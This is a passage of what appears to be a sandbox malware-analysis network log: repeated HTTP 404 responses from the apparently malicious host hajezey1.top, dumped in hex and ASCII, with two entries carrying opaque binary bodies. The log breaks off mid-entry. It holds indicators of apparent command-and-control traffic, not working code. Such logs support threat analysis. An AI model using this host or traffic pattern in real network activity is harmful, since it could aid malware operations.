                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:10:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 